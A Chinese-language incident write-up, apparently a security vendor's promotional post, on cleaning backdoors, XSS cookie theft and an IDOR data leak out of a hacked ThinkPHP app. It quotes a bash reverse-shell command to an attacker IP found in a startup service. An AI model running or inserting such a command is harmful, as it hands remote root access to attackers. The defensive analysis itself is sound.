域名預(yù)訂/競(jìng)價(jià)，好“米”不錯(cuò)過(guò)

相信有很多站長(zhǎng)以及運(yùn)營(yíng)網(wǎng)站或APP的技術(shù)人員都有一些安全上的困擾，尤其是對(duì)網(wǎng)站代碼里存在后門(mén)文件，以及服務(wù)器被植入木馬病毒的安全問(wèn)題很鬧心，前段時(shí)間我們接到客戶(hù)的安全咨詢(xún)，說(shuō)是找的第三方開(kāi)發(fā)公司做的APP和后臺(tái)，運(yùn)營(yíng)了起來(lái)差不多3個(gè)月，一開(kāi)始注冊(cè)的會(huì)員量不是很多，當(dāng)注冊(cè)達(dá)到成千上萬(wàn)個(gè)會(huì)員注冊(cè)量的時(shí)候,就相繼出現(xiàn)了安全上的問(wèn)題，數(shù)據(jù)庫(kù)總是被篡改，會(huì)員信息泄露，以及被阿里云提示的云安全中心，安全事件提醒，尊敬的*玉:云盾云安全中心檢測(cè)到您的服務(wù)器:47.180.*.*(主服務(wù)器)出現(xiàn)了緊急安全事件:自啟動(dòng)后門(mén)，建議您立即進(jìn)行處理。進(jìn)程異常行為-反彈Shell和異常網(wǎng)絡(luò)連接-反彈shell網(wǎng)絡(luò)外連以及惡意腳本代碼執(zhí)行還有Linux可疑命令序列惡意軟件-后門(mén)程序等告警，針對(duì)這些安全問(wèn)題，我們來(lái)給大家科普一下，如何去除網(wǎng)站后門(mén)木馬以及代碼漏洞檢測(cè)等問(wèn)題。

攻擊情況介紹：

當(dāng)天我們收到客戶(hù)的電話(huà)咨詢(xún)，客戶(hù)的平臺(tái)、APP和H5端、以及后臺(tái)遭到黑客入侵，并篡改了數(shù)據(jù)庫(kù)里面的數(shù)據(jù)，導(dǎo)致平臺(tái)的損失過(guò)萬(wàn)，詳細(xì)詢(xún)問(wèn)了客戶(hù)的平臺(tái)架構(gòu)以及部署的服務(wù)器數(shù)量，發(fā)現(xiàn)客戶(hù)用的是Thinkphp架構(gòu)開(kāi)發(fā)，APP的API接口和H5端以及后臺(tái)管理都是在該架構(gòu)的基礎(chǔ)上開(kāi)發(fā)的，因?yàn)檫@套代碼是客戶(hù)從買(mǎi)來(lái)后找的第三方公司進(jìn)行的二次開(kāi)發(fā)，第三方開(kāi)發(fā)公司對(duì)里面的代碼后門(mén)并不清楚，很多低價(jià)賣(mài)源碼的，肯定是有利益可圖的。建議大家買(mǎi)來(lái)后一定要對(duì)網(wǎng)站源碼進(jìn)行代碼安全審計(jì)和網(wǎng)站后門(mén)審計(jì)服務(wù)，尤其是對(duì)準(zhǔn)備剛上線(xiàn)的APP平臺(tái)，對(duì)安全問(wèn)題要重視起來(lái)，否則到了后期會(huì)員規(guī)模上來(lái)后，損失的就不止這一點(diǎn)了。

跟客戶(hù)進(jìn)行了詳細(xì)的對(duì)接，梳理了所有的服務(wù)器的信息以及網(wǎng)站源碼的位置，我們的SINE安全工程師立即將代碼打包到本地，進(jìn)行源代碼安全審計(jì)，通過(guò)對(duì)用戶(hù)注冊(cè)以及APP里的具體功能代碼，都進(jìn)行了全面的人工漏洞測(cè)試，發(fā)現(xiàn)在留言反饋以及會(huì)員信息功能，存在XSS跨站漏洞，這個(gè)漏洞可以將XSS攻擊代碼植入到后臺(tái)里去，當(dāng)后臺(tái)的管理人員查看了反饋的留言或用戶(hù)的個(gè)人詳情，就會(huì)直接觸發(fā)該XSS漏洞，XSS漏洞可以獲取到網(wǎng)站后臺(tái)的地址，以及管理員的Session和cookies，有了這2個(gè)值，黑客就可以登錄后臺(tái)了，對(duì)APP里的API接口也進(jìn)行詳細(xì)的安全審計(jì)，發(fā)現(xiàn)存在會(huì)員信息泄露漏洞，由于未對(duì)UID值進(jìn)行當(dāng)前賬號(hào)權(quán)限判斷，可以越權(quán)查看其它UID的會(huì)員信息，像手機(jī)號(hào)以及注冊(cè)時(shí)間，銀行卡，錢(qián)包地址，密碼等等的信息，都可以越權(quán)查看，我們SINE安全工程師對(duì)代碼中的一些函數(shù)功能代碼進(jìn)行審計(jì)，檢測(cè)出了源碼作者留的一句話(huà)木馬后門(mén)，而且還是加密形式免殺webshell，代碼如下：

真是道高一尺魔高一丈，源碼作者留的后門(mén)，手段非常高，一般的建站公司技術(shù)是沒(méi)辦法看出這個(gè)文件是木馬代碼的，我們對(duì)其網(wǎng)站的訪問(wèn)日志以及APP的接口日志進(jìn)行人工檢查，還發(fā)現(xiàn)了后臺(tái)登錄這里被黑客動(dòng)了手腳，只要管理員登錄成功會(huì)立即把用戶(hù)名和密碼寫(xiě)到/data/目錄下的robots.txt文件中，建議大家日后做檢查代碼的時(shí)候先搜索下_encode關(guān)鍵詞看看有沒(méi)有可疑的，以及搜索關(guān)鍵詞eval函數(shù)的都有哪些再調(diào)用，因?yàn)楹芏嘁痪湓?huà)木馬都是調(diào)用的eval函數(shù)，通過(guò)對(duì)每個(gè)代碼的安全審計(jì)發(fā)現(xiàn)上傳功能的代碼中存在上傳后門(mén)具體代碼如下：

后門(mén)真是太多了，防不勝防，辛虧客戶(hù)找到了我們SINE安全對(duì)網(wǎng)站代碼進(jìn)行了詳細(xì)的安全審計(jì)和漏洞測(cè)試，我們對(duì)網(wǎng)站的上傳的目錄進(jìn)行了腳本執(zhí)行權(quán)限控制，對(duì)eval的后門(mén)進(jìn)行了強(qiáng)制刪除，以及對(duì)管理后臺(tái)登錄這里的后門(mén)進(jìn)行了修復(fù)，對(duì)一些XSS跨站攻擊的代碼進(jìn)行了攻擊防護(hù)，對(duì)所有g(shù)et post變量提交的參數(shù)進(jìn)行了安全過(guò)濾，凡是包含xss跨站代碼的，以及非法植入攻擊代碼的都進(jìn)行了攔截過(guò)濾，并對(duì)整套代碼進(jìn)行了安全加固與防護(hù)，也同時(shí)對(duì)服務(wù)器進(jìn)行了端口安全策略部署和基礎(chǔ)安全設(shè)置，如注冊(cè)表權(quán)限，環(huán)境運(yùn)行賬戶(hù)權(quán)限，mysql數(shù)據(jù)庫(kù)的權(quán)限分離設(shè)置，以及nginx的運(yùn)行賬戶(hù)進(jìn)行了設(shè)置，防止通過(guò)網(wǎng)站后門(mén)木馬進(jìn)行提權(quán)拿到服務(wù)器權(quán)限，如果想要對(duì)網(wǎng)站代碼進(jìn)行后門(mén)查找和清除和漏洞人工測(cè)試服務(wù)的可以向網(wǎng)站漏洞修復(fù)服務(wù)商SINE安全或鷹盾安全以及啟明星辰，大樹(shù)安全等這些服務(wù)商尋求技術(shù)支持。針對(duì)阿里云的云安全中心安全事件提醒，我們讓客戶(hù)提供了阿里云賬號(hào)和密碼，登錄后，對(duì)該安全事件的詳情進(jìn)行了查看，發(fā)現(xiàn)確實(shí)是黑客植入了自啟動(dòng)的后門(mén)，我們對(duì)Linux系統(tǒng)的自啟動(dòng)服務(wù)進(jìn)行了查看，發(fā)現(xiàn)黑客植入的木馬病毒，每次重啟服務(wù)器都會(huì)自動(dòng)啟動(dòng)該服務(wù)，向外發(fā)送連接請(qǐng)求，Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 該命令是直接反彈了Linux root SHELL到1.15.235.160黑客的服務(wù)器。我們對(duì)該IP進(jìn)行了阿里云安全組IP限制，以及對(duì)系統(tǒng)里的自啟動(dòng)服務(wù)進(jìn)行了刪除與防篡改部署，至此客戶(hù)的APP被黑客攻擊以及篡改數(shù)據(jù)的問(wèn)題得到了徹底的解決。也希望我們的解決過(guò)程分享，能幫到更多的人。

申請(qǐng)創(chuàng)業(yè)報(bào)道，分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處，共同探討創(chuàng)業(yè)新機(jī)遇！